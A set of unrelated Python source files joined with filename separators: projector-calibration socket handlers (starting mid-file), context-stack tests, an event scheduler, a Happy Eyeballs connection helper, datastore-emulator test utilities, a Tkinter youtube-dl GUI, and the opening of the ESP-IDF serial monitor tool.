config = InstanceConfiguration.get(id=id)
config.kinectTopLeftX = data["kinectTopLeft"]["x"]
config.kinectTopLeftY = data["kinectTopLeft"]["y"]
config.kinectTopRightX = data["kinectTopRight"]["x"]
config.kinectTopRightY = data["kinectTopRight"]["y"]
config.kinectBottomRightX = data["kinectBottomRight"]["x"]
config.kinectBottomRightY = data["kinectBottomRight"]["y"]
config.kinectBottomLeftX = data["kinectBottomLeft"]["x"]
config.kinectBottomLeftY = data["kinectBottomLeft"]["y"]
config.update()
def calibrate(id):
print("Waiting for cameras to adjust...")
sleep(0.5)
ic = InstanceConfiguration.get(id=id).calibrate().update()
socketio.emit('blank_canvas_black', id, broadcast=True)
# socketio.emit('calibrate_instance_configuration', ic.as_object(), broadcast=True)
socketio.emit('draw_canvas', broadcast=True)
print('Calibrated')
@socketio.on('calibrate_instance_configuration')
def calibrate_instance_configuration(instanceConfigId):
"""
Calibrate an instance configuration by trying to connect to the camera and auto-extracting projector bounds
"""
print('Calibrating instance configuration {}'.format(instanceConfigId))
emit('blank_canvas_white', instanceConfigId, broadcast=True)
threading.Thread(target=calibrate, args=(instanceConfigId,)).start()
@socketio.on('purge_instance_configurations')
def purge_instance_configurations():
InstanceConfiguration.delete_all()
@socketio.on('get_latest_image_id_by_instance_configuration')
def get_latest_image_id_by_instance_configuration(instanceConfigId):
ic = InstanceConfiguration.get(instanceConfigId)
emit('get_latest_image_id_by_instance_configuration', ic.get_latest_image_id())
@socketio.on('toggle_kinect_enable')
def toggle_kinect_enable():
ToggleKinectEnable()
print("kinectEnable = {}".format(GetKinectEnable()))
@socketio.on('get_kinect_image_url')
def get_kinect_image_url(icId):
ic = InstanceConfiguration.get(id=icId)
emit('get_kinect_image_url', "http://"+ic.kinectHost+"/"+ic.kinectPort+"/calibrate")
print('Registered Instance Configuration API methods')
|
test_context.py
|
#
# Copyright (c) 2015-2018 Canonical, Ltd.
#
# This file is part of Talisker
# (see http://github.com/canonical-ols/talisker).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import * # noqa
import sys
import threading
import time
from freezegun import freeze_time
import future.utils
import pytest
from talisker.context import (
Context,
ContextStack,
NullContextStack,
enable_gevent_context,
enable_eventlet_context,
request_timeout,
)
def test_context_api():
Context.new()
Context.logging.push(a=1)
Context.request_id = 'id'
Context.track('test', 1.0)
assert Context.current().logging.flat == {'a': 1}
assert Context.current().request_id == 'id'
assert Context.current().tracking['test'].count == 1
assert Context.current().tracking['test'].time == 1.0
Context.clear()
assert Context.current().logging.flat == {}
assert Context.current().request_id is None
assert Context.current().tracking == {}
def test_null_context():
Context.request_id = 'test'
Context.set_debug()
Context.soft_timeout = 10
Context.set_relative_deadline(10)
Context.track('sql', 1.0)
assert Context.request_id is None
assert Context.debug is False
assert Context.soft_timeout == -1
assert Context.deadline_timeout() is None
assert Context.current().tracking == {}
with Context.logging(foo='bar'):
assert Context.logging.flat == {}
def test_context_thread():
e1 = threading.Event()
e2 = threading.Event()
def worker():
Context.new()
Context.logging.push(a=2)
Context.track('test', 1.0)
e1.set()
e2.wait()
assert Context.logging.flat == {'a': 2}
Context.logging.pop()
e1.set()
assert Context.logging.flat == {}
assert Context.current().tracking['test'].count == 1
t = threading.Thread(target=worker)
Context.new()
Context.track('test', 1.0)
Context.logging.push(a=1)
assert Context.logging.flat == {'a': 1}
t.start()
e1.wait()
e1.clear()
assert Context.logging.flat == {'a': 1}
assert Context.current().tracking['test'].count == 1
e2.set()
e1.wait()
assert Context.logging.flat == {'a': 1}
t.join()
def test_context_gevent(request):
try:
import gevent
except ImportError:
pytest.skip('gevent must be installed')
request.addfinalizer(enable_gevent_context())
def f1():
assert Context.logging.flat == {}
Context.logging.push({'f1': 1})
Context.track('gevent', 1.0)
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
gevent.sleep(0.2) # yield to let f2 run
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
def f2():
assert Context.logging.flat == {}
Context.logging.push({'f2': 2})
Context.track('gevent', 1.0)
assert Context.current().tracking['gevent'].count == 1
assert Context.logging.flat == {'f2': 2}
g1 = gevent.spawn(f1)
g2 = gevent.spawn(f2)
gevent.joinall([g1, g2], timeout=2)
@pytest.mark.skipif(sys.version_info >= (3, 7), reason="<py3.7 only")
def test_context_eventlet(request):
try:
import eventlet
except ImportError:
pytest.skip('eventlet must be installed')
request.addfinalizer(enable_eventlet_context())
def f1():
assert Context.logging.flat == {}
Context.logging.push({'f1': 1})
Context.track('gevent', 1.0)
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
eventlet.sleep(0.2) # yield to let f2 run
assert Context.logging.flat == {'f1': 1}
assert Context.current().tracking['gevent'].count == 1
def f2():
assert Context.logging.flat == {}
Context.logging.push({'f2': 2})
Context.track('gevent', 1.0)
assert Context.current().tracking['gevent'].count == 1
assert Context.logging.flat == {'f2': 2}
pool = eventlet.GreenPool()
pool.spawn(f1)
pool.spawn(f2)
pool.waitall()
if future.utils.PY3:
from tests.py3_asyncio_context import test_context_asyncio # NOQA
def test_stack_basic():
stack = ContextStack()
stack.push(a=1)
assert stack['a'] == 1
assert list(stack.items()) == [('a', 1)]
stack.push(b=2)
assert stack['b'] == 2
assert list(stack.items()) == [('b', 2), ('a', 1)]
stack.push(a=3)
assert stack['a'] == 3
assert list(stack.items()) == [('a', 3), ('b', 2)]
stack.pop()
assert stack['a'] == 1
assert list(stack.items()) == [('b', 2), ('a', 1)]
stack.pop()
assert stack['a'] == 1
assert list(stack.items()) == [('a', 1)]
stack.pop()
with pytest.raises(KeyError):
stack['a']
assert list(stack.items()) == []
def test_stack_context_manager():
stack = ContextStack()
stack.push(a=1)
assert list(stack.items()) == [('a', 1)]
with stack(b=2):
assert list(stack.items()) == [('b', 2), ('a', 1)]
assert list(stack.items()) == [('a', 1)]
def test_stack_dict_arg():
stack = ContextStack()
with stack({'a': 1}):
assert list(stack.items()) == [('a', 1)]
with stack({'a': 1}, b=2):
# order not preserved, as kwargs
assert dict(stack) == {'a': 1, 'b': 2}
def test_stack_unwind():
stack = ContextStack()
stack.push(a=1)
assert stack['a'] == 1
level = stack.push(a=2)
assert stack['a'] == 2
stack.push(a=3)
stack.push(a=4)
assert stack['a'] == 4
stack.unwind(level)
assert stack['a'] == 1
def test_null_context_stack():
stack = NullContextStack()
stack.push(a=1)
assert dict(stack) == {}
assert stack.flat == {}
def test_does_not_use_or_modify_dict():
stack = ContextStack()
d = {'a': 1}
stack.push(d, b=2)
assert stack['a'] == 1
assert stack['b'] == 2
assert d == {'a': 1}
d['a'] = 2
assert stack['a'] == 1
def test_tracking():
Context.new()
Context.track('sql', 1.0)
Context.track('sql', 2.0)
Context.track('http', 3.0)
assert Context.current().tracking['sql'].count == 2
assert Context.current().tracking['sql'].time == 3.0
assert Context.current().tracking['http'].count == 1
assert Context.current().tracking['http'].time == 3.0
@freeze_time()
def test_request_timeout():
Context.new()
result = {}
@request_timeout(timeout=1000, soft_timeout=500)
def f():
result['timeout'] = Context.current().deadline
result['soft_timeout'] = Context.soft_timeout
f()
assert result['timeout'] == time.time() + 1.0
assert result['soft_timeout'] == 500
|
scheduler.py
|
import threading
import time
import logging
logger = logging.getLogger(__name__)
class Event:
def __init__(self, callback, param):
self.callback = callback
self.param = param
def trigger(self, *args):
if self.param is None:
self.callback(*args)
else:
self.callback(*args, self.param)
def kill(self):
if self in events:
events.remove(self)
def update(self): raise NotImplementedError("Event.update")
class Socket(Event):
def __init__(self, callback, param, socket):
super().__init__(callback, param)
self.socket = socket
def update(self):
data = self.socket.recv()
if data is not None:
self.trigger(data)
class Timeout(Event):
def __init__(self, callback, param, timeout, repeat=False):
super().__init__(callback, param)
self.timeout = timeout
self.repeat = repeat
self.reset()
def update(self):
if time.time() > self.deadline:
self.trigger()
if self.repeat:
self.reset()
else:
self.kill()
def reset(self):
self.deadline = time.time() + self.timeout
thread = None
events = []
def add_socket(callback, socket, param=None):
start_thread()
event = Socket(callback, param, socket)
events.append(event)
return event
def add_timeout(callback, timeout, repeat=False, param=None):
start_thread()
event = Timeout(callback, param, timeout, repeat)
events.append(event)
return event
def remove(event):
event.kill()
def process_events():
for event in events[:]:
try:
event.update()
except:
logger.error("An exception occurred while processing an event")
import traceback
traceback.print_exc()
event.kill()
def update():
if threading.current_thread() == thread:
process_events()
def start_thread():
global thread
if not thread:
thread = threading.Thread(target=event_loop, daemon=True)
thread.start()
def event_loop():
while True:
process_events()
time.sleep(0.02)
|
happyeyeballs.py
|
#!/usr/bin/env python
# Python implementation of RFC 6555 / Happy Eyeballs: find the quickest IPv4/IPv6 connection
# See https://tools.ietf.org/html/rfc6555
# Method: Start parallel sessions using threads, and only wait for the quickest succesful socket connect
# If the HOST has an IPv6 address, IPv6 is given a head start by delaying IPv4. See https://tools.ietf.org/html/rfc6555#section-4.1
# You can run this as a standalone program, or as a module:
"""
from happyeyeballs import happyeyeballs
print happyeyeballs('newszilla.xs4all.nl', port=119)
"""
# or with more logging:
'''
from happyeyeballs import happyeyeballs
import logging
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
print happyeyeballs('newszilla.xs4all.nl', port=119)
'''
import socket
import ssl
import Queue
import threading
import time
import logging
DEBUG = False
# called by each thread
def do_socket_connect(queue, ip, PORT, SSL, ipv4delay):
# connect to the ip, and put the result into the queue
if DEBUG: logging.debug("Input for thread is %s %s %s", ip, PORT, SSL)
try:
# CREATE SOCKET
if ip.find(':') >= 0:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
if ip.find('.') >= 0:
time.sleep(ipv4delay) # IPv4 ... so a delay for IPv4 as we prefer IPv6. Note: ipv4delay could be 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
if not SSL:
# Connect ...
s.connect((ip, PORT))
# ... and close
s.close()
else:
# WRAP SOCKET
wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
# CONNECT
wrappedSocket.connect((ip, PORT))
# CLOSE SOCKET CONNECTION
wrappedSocket.close()
queue.put((ip, True))
if DEBUG: logging.debug("connect to %s OK", ip)
except:
queue.put((ip, False))
if DEBUG: logging.debug("connect to %s not OK", ip)
pass
def happyeyeballs(HOST, **kwargs):
# Happyeyeballs function, with caching of the results
# Fill out the parameters into the variables
try:
PORT = kwargs['port']
except:
PORT = 80
try:
SSL = kwargs['ssl']
except:
SSL = False
try:
preferipv6 = kwargs['preferipv6']
except:
preferipv6 = True # prefer IPv6, so give IPv6 connects a head start by delaying IPv4
# Find out if a cached result is available, and recent enough:
timecurrent = int(time.time()) # current time in seconds since epoch
retentionseconds = 100
hostkey = (HOST, PORT, SSL, preferipv6) # Example key: (u'ssl.astraweb.com', 563, True, True)
try:
happyeyeballs.happylist[hostkey] # just to check: does it exist?
# No exception, so entry exists, so let's check the time:
timecached = happyeyeballs.happylist[hostkey][1]
if timecurrent - timecached <= retentionseconds:
if DEBUG: logging.debug("existing cached result recent enough")
return happyeyeballs.happylist[hostkey][0]
else:
if DEBUG: logging.debug("existing cached result too old. Find a new one")
# Continue a few lines down
except:
# Exception, so entry not there, so we have to fill it out
if DEBUG: logging.debug("Host not yet in the cache. Find entry")
pass
# we only arrive here if the entry has to be determined. So let's do that:
# We have to determine the (new) best IP address
start = time.clock()
if DEBUG: logging.debug("\n\n%s %s %s %s", HOST, PORT, SSL, preferipv6)
ipv4delay = 0
try:
# Check if there is an AAAA / IPv6 result for this host:
socket.getaddrinfo(HOST, PORT, socket.AF_INET6, socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
if DEBUG: logging.debug("IPv6 address found for %s", HOST)
if preferipv6:
ipv4delay=0.1 # preferipv6, AND at least one IPv6 found, so give IPv4 (!) a delay so that IPv6 has a head start and is preferred
except:
if DEBUG: logging.debug("No IPv6 address found for %s", HOST)
myqueue = Queue.Queue() # queue used for threads giving back the results
try:
# Get all IP (IPv4 and IPv6) addresses:
allinfo = socket.getaddrinfo(HOST, PORT, 0, 0, socket.IPPROTO_TCP)
for info in allinfo:
address = info[4][0]
thisthread = threading.Thread(target=do_socket_connect, args=(myqueue, address, PORT, SSL, ipv4delay))
thisthread.daemon = True
thisthread.start()
result = None # default return value, used if none of threads says True/"OK", so no connect on any IP address
# start reading from the Queue for message from the threads:
for i in range(len(allinfo)):
s = myqueue.get() # get a response
if s[1] == True:
result = s[0]
break # the first True/"OK" is enough, so break out of for loop
except:
if DEBUG: logging.debug("something went wrong in the try block")
result = None
logging.info("Quickest IP address for %s (port %s, ssl %s, preferipv6 %s) is %s", HOST, PORT, SSL, preferipv6, result)
delay = int(1000 * (time.clock() - start))
logging.debug("Happy Eyeballs lookup and port connect took %s ms", delay)
# We're done. Store and return the result
if result:
happyeyeballs.happylist[hostkey] = ( result, timecurrent )
if DEBUG: logging.debug("Determined new result for %s with result %s", (hostkey, happyeyeballs.happylist[hostkey]) )
return result
happyeyeballs.happylist = {} # The cached results. This static variable must be after the def happyeyeballs()
if __name__ == '__main__':
logger = logging.getLogger('')
logger.setLevel(logging.INFO)
if DEBUG: logger.setLevel(logging.DEBUG)
# plain HTTP/HTTPS sites:
print happyeyeballs('www.google.com')
print happyeyeballs('www.google.com', port=443, ssl=True)
print happyeyeballs('www.nu.nl')
# newsservers:
print happyeyeballs('newszilla6.xs4all.nl', port=119)
print happyeyeballs('newszilla.xs4all.nl', port=119)
print happyeyeballs('block.cheapnews.eu', port=119)
print happyeyeballs('block.cheapnews.eu', port=443, ssl=True)
print happyeyeballs('sslreader.eweka.nl', port=563, ssl=True)
print happyeyeballs('news.thundernews.com', port=119)
print happyeyeballs('news.thundernews.com', port=119, preferipv6=False)
print happyeyeballs('secure.eu.thundernews.com', port=563, ssl=True)
# Strange cases
print happyeyeballs('does.not.resolve', port=443, ssl=True)
print happyeyeballs('www.google.com', port=119)
print happyeyeballs('216.58.211.164')
|
test_utils.py
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################
"""Utility functions for testing cloud functions."""
import datetime
import os
import subprocess
import threading
import requests
DATASTORE_READY_INDICATOR = b'is now running'
DATASTORE_EMULATOR_PORT = 8432
EMULATOR_TIMEOUT = 20
TEST_PROJECT_ID = 'test-project'
# pylint: disable=arguments-differ
class SpoofedDatetime(datetime.datetime):
"""Mocking Datetime class for now() function."""
@classmethod
def now(cls):
return datetime.datetime(2020, 1, 1, 0, 0, 0)
def start_datastore_emulator():
"""Start Datastore emulator."""
return subprocess.Popen([
'gcloud',
'beta',
'emulators',
'datastore',
'start',
'--consistency=1.0',
'--host-port=localhost:' + str(DATASTORE_EMULATOR_PORT),
'--project=' + TEST_PROJECT_ID,
'--no-store-on-disk',
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
def wait_for_emulator_ready(proc,
emulator,
indicator,
timeout=EMULATOR_TIMEOUT):
"""Wait for emulator to be ready."""
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if not ready and indicator in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(timeout):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
return thread
def reset_ds_emulator():
"""Reset ds emulator/clean all entities."""
req = requests.post(
'http://localhost:{}/reset'.format(DATASTORE_EMULATOR_PORT))
req.raise_for_status()
def cleanup_emulator(ds_emulator):
"""Cleanup the system processes made by ds emulator."""
del ds_emulator #To do, find a better way to cleanup emulator
os.system('pkill -f datastore')
def set_gcp_environment():
"""Set environment variables for simulating in google cloud platform."""
os.environ['DATASTORE_EMULATOR_HOST'] = 'localhost:' + str(
DATASTORE_EMULATOR_PORT)
os.environ['GOOGLE_CLOUD_PROJECT'] = TEST_PROJECT_ID
os.environ['DATASTORE_DATASET'] = TEST_PROJECT_ID
os.environ['GCP_PROJECT'] = TEST_PROJECT_ID
os.environ['FUNCTION_REGION'] = 'us-central1'
def get_test_data_file_path(filename):
"""Returns the path to a test data file with name |filename|."""
return os.path.join(os.path.dirname(__file__), 'test_data', filename)
|
update_preview.py
|
from tkinter import *
from tkinter import ttk
import threading
import os
from PIL import Image, ImageTk
import youtube_dl as yt
def my_hook(d):
global status, merged
if kill_event.is_set():
print("\nTerminated")
delthread = threading.Timer(3.0, lambda: os.remove(d['tmpfilename']))
delthread.start()
raise ConnectionAbortedError
if pause_event.is_set():
print("\nPaused")
raise ConnectionAbortedError
if d['status'] == 'finished':
if merged:
status = 'Finished'
update_dict()
else:
status = 'Post Processing'
merged = True
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', d['_total_bytes_str'])
treeview.set(row, 'percent', '100.0%')
treeview.set(row, 'eta', '0:00')
treeview.set(row, 'speed', 'N/A')
treeview.set(row, 'status', status)
thread_event = threading.Event()
thread_event.wait(1.50)
if d['status'] == 'downloading':
if status != 'Downloading':
status = 'Downloading'
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', d['_total_bytes_str'])
treeview.set(row, 'percent', d['_percent_str'])
treeview.set(row, 'eta', d['_eta_str'])
treeview.set(row, 'speed', d['_speed_str'])
treeview.set(row, 'status', status)
if d['status'] == 'error':
if status != 'Error':
status = 'Error'
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', '-')
treeview.set(row, 'percent', '-')
treeview.set(row, 'eta', '-')
treeview.set(row, 'speed', '-')
treeview.set(row, 'status', status)
class MyLogger:
@staticmethod
def debug(msg):
thread_event = threading.Event()
thread_event.wait(0.25)
@staticmethod
def warning(msg):
if msg == "ERROR: unable to download video data: ":
pass
else:
global status
if status != 'Error':
status = 'Error'
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', '-')
treeview.set(row, 'percent', '-')
treeview.set(row, 'eta', '-')
treeview.set(row, 'speed', '-')
treeview.set(row, 'status', status)
print(msg)
@staticmethod
def error(msg):
if msg == "ERROR: unable to download video data: ":
pass
else:
global status
if status != 'Error':
status = 'Error'
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', '-')
treeview.set(row, 'percent', '-')
treeview.set(row, 'eta', '-')
treeview.set(row, 'speed', '-')
treeview.set(row, 'status', status)
print(msg)
root = Tk()
root.title("Learning Tkinter - TreeView")
root.configure(bg='#ededed', bd=5)
root.geometry("1000x280")
root.minsize(1000, 280) # can set the minimum size
root.maxsize(1000, 560) # can set the maximum size
def resize(event):
try:
height = root.winfo_height()
terminate_btn.place(x=920, y=height-50)
pause_btn.place(x=500, y=height-50)
except:
pass
root.bind("<Configure>", resize)
treeview = ttk.Treeview(root)
treeview.grid(padx=29)
treeview.config(height=10)
treeview.config(columns=('ext', 'size', 'percent', 'eta', 'speed', 'status'))
treeview.column('#0', width=280, anchor=W)
treeview.column('ext', width=100, anchor=W)
treeview.column('size', width=100, anchor=W)
treeview.column('percent', width=100, anchor=W)
treeview.column('eta', width=100, anchor=W)
treeview.column('speed', width=100, anchor=W)
treeview.column('status', width=150, anchor=W)
treeview.heading('#0', text="Title", anchor=W)
treeview.heading('ext', text="Extension", anchor=W)
treeview.heading('size', text="Size", anchor=W)
treeview.heading('percent', text="Percent", anchor=W)
treeview.heading('eta', text="ETA", anchor=W)
treeview.heading('speed', text="Speed", anchor=W)
treeview.heading('status', text="Status", anchor=W)
status = 'Queued'
row = 'URL1'
merged = False
rows = ['URL1']
row_dict = {
"URL1": status
}
treeview.insert("", '0', row, text="-")
treeview.set(row, 'ext', '-')
treeview.set(row, 'size', '-')
treeview.set(row, 'percent', '0.0%')
treeview.set(row, 'eta', '-')
treeview.set(row, 'speed', '-')
treeview.set(row, 'status', status)
count = 1
def callback(event):
global count
def remove(i):
treeview.selection_remove(i)
def assign():
global count
count = 1
if count == 1:
count = 2
for i in row_dict:
if row_dict.get(i) == 'Terminated':
remove(i)
if row_dict.get(i) == 'Queued':
remove(i)
thread = threading.Timer(0.2, assign) # using threading to stop this function from looping
thread.start()
def update_dict():
row_dict.update(URL1=status)
print(row_dict)
def pause_thread():
def pause():
if treeview.selection() == ():
pass
else:
global resume_btn, resume_img, status
status = 'Paused'
update_dict()
treeview.set(row, 'status', status)
pause_btn.destroy()
resume_img = ImageTk.PhotoImage(Image.open('images/#resume_32px.png'))
resume_btn = ttk.Button(root, image=resume_img, command=resume_thread)
resume_btn.place(x=500, y=root.winfo_height()-50)
pause_event.set()
pause_thread = threading.Thread(target=pause)
pause_thread.start()
def resume_thread():
def resume():
if treeview.selection() == ():
pass
else:
global pause_btn, pause_img, status
status = 'Resuming'
update_dict()
treeview.set(row, 'status', status)
resume_btn.destroy()
pause_img = ImageTk.PhotoImage(Image.open('images/#pause_32px.png'))
pause_btn = ttk.Button(root, image=pause_img, command=pause_thread)
pause_btn.place(x=500, y=root.winfo_height()-50)
resume_event.set()
if resume_event.is_set():
pause_event.clear()
resume_event.clear()
download_ytdl()
resume_thread = threading.Thread(target=resume)
resume_thread.start()
def terminate_thread():
def terminate():
if treeview.selection() == ():
pass
else:
global status
status = 'Terminated'
treeview.item(row, text='TERMINATED')
treeview.set(row, 'ext', f'N/A')
treeview.set(row, 'size', 'N/A')
treeview.set(row, 'percent', '0.0%')
treeview.set(row, 'eta', '0:00')
treeview.set(row, 'speed', 'N/A')
treeview.set(row, 'status', status)
update_dict()
treeview.selection_remove(row)
kill_event.set()
terminate_thread = threading.Thread(target=terminate)
terminate_thread.start()
treeview.bind("<<TreeviewSelect>>", callback)
treeview.config(selectmode='browse') # allow 1 at a time to be selected
terminate_img = ImageTk.PhotoImage(Image.open('images/#stop_32px.png'))
terminate_btn = ttk.Button(root, image=terminate_img, command=terminate_thread)
terminate_btn.place(x=920, y=230)
pause_img = ImageTk.PhotoImage(Image.open('images/#pause_32px.png'))
pause_btn = ttk.Button(root, image=pause_img, command=pause_thread)
pause_btn.place(x=500, y=230)
pause_event = threading.Event()
resume_event = threading.Event()
kill_event = threading.Event()
video_ops = {
'outtmpl': 'R:/Downloaded Videos/%(title)s.%(ext)s',
'format': 'bestvideo[height<=360,width<=640]+bestaudio/best[abr<=1441]',
'ext': 'mkv',
'merge_output_format': 'mkv',
'quiet': True,
'progress_hooks': [my_hook],
'logger': MyLogger()
}
link = 'https://www.youtube.com/watch?v=QglaLzo_aPk'
def download_ytdl():
with yt.YoutubeDL(video_ops) as ydl:
global meta, status
if status == 'Queued':
meta = ydl.extract_info(link, download=False)
status = 'Pre Processing'
update_dict()
treeview.item(row, text=link)
treeview.set(row, 'status', status)
thread_event = threading.Event()
thread_event.wait(1.00)
try:
ydl.download([link])
except yt.utils.DownloadError as exc:
if status == 'Terminated':
kill_event.clear()
yt_thread = threading.Timer(5.0, download_ytdl)
yt_thread.start()
mainloop()
|
printer.py
|
from threading import Thread
from time import sleep
def printer():
for i in range(3):
print(i, end=" ")
sleep(0.1)
thr = Thread(target=printer, daemon=True)
thr.start()
print() # Add newline
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run flash build target to rebuild and flash entire project (Ctrl-T Ctrl-F)
# - Run app-flash build target to rebuild and flash app only (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
from __future__ import unicode_literals
from builtins import chr
from builtins import object
from builtins import bytes
import subprocess
import argparse
import codecs
import datetime
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.list_ports
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
from io import open
import textwrap
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_X = '\x18'
CTRL_L = '\x0c'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# Command parsed from console inputs
CMD_STOP = 1
CMD_RESET = 2
CMD_MAKE = 3
CMD_APP_FLASH = 4
CMD_OUTPUT_TOGGLE = 5
CMD_TOGGLE_LOGGING = 6
CMD_ENTER_BOOT = 7
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
TAG_CMD = 3
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, cmd_queue, parser, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.cmd_queue = cmd_queue
self.parser = parser
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
# In testing mode the stdin is connected to PTY but is not used for input anything. For PTY
# the canceling by fcntl.ioctl isn't working and would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
ret = self.parser.parse(c)
if ret is not None:
(tag, cmd) = ret
# stop command should be executed last
if tag == TAG_CMD and cmd != CMD_STOP:
self.cmd_queue.put(ret)
else:
self.event_queue.put(ret)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class ConsoleParser(object):
def __init__(self, eol="CRLF"):
self.translate_eol = {
"CRLF": lambda c: c.replace("\n", "\r\n"),
"CR": lambda c: c.replace("\n", "\r"),
"LF": lambda c: c.replace("\r", "\n"),
}[eol]
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self._pressed_menu_key = False
